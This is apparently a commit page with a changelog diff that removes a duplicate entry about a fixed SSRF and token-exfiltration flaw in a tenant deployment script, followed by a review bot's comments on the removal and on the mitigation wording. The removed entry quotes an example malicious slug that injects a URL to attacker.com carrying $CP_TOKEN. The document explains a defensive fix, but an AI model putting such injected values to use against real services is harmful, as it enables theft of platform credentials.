fix(docs): remove duplicate OFFSEC-006 entry per hongming-pc2 review (docs#41 has authoritative entry; set -f claim inaccurate)
Secret scan / secret-scan (pull_request) Successful in 2m3s
CI / build (pull_request) Successful in 4m10s

2026-05-15 11:31:33 +00:00
parent 3992150a47
commit e9aac3629c
@@ -11,11 +11,6 @@ Entries are published daily at 23:50 UTC.
## 2026-05-14
### 🔒 Security
- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths (`cp_redeploy_tenant`, `tenant_buildinfo`, `tenant_health`, `resolve_tenant_instance_id`) and ECR identifiers without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token via URL parameter injection. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call is issued, and uses `set -f` to disable glob expansion of metacharacters (`*`, `?`, `[`) in slug values. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
### 🔧 Fixes
- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, `ConversationTraceModal`, `ActivityTab`, `ScheduleTab`, and `SkillsTab`. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949))
### 🧹 Internal
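Review bot: Removing the OFFSEC-006 entry leaves the `### 🔒 Security` heading for 2026-05-14 with no entries under it, and nothing in this changelog now points readers to docs#41, which the commit message names as the authoritative entry. Either drop the now-empty heading in the same hunk or keep a one-line pointer such as `- **OFFSEC-006**: see docs#41 for the authoritative entry.` so the date's security section is not silently blank. For the record, the commit message's "set -f claim inaccurate" matches the removed text: `set -f` only disables pathname expansion of an unquoted `*`, `?` or `[`, it does nothing about `?`, `&`, `=` or `$` inside a URL string, and the `validate_slug()` allowlist `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` is what actually rejects such slugs, so the replacement entry in docs#41 should describe the mitigation in those terms. Unrelated to the removal but visible in the context lines: the Canvas accessibility entry lists `ConversationTraceModal` twice.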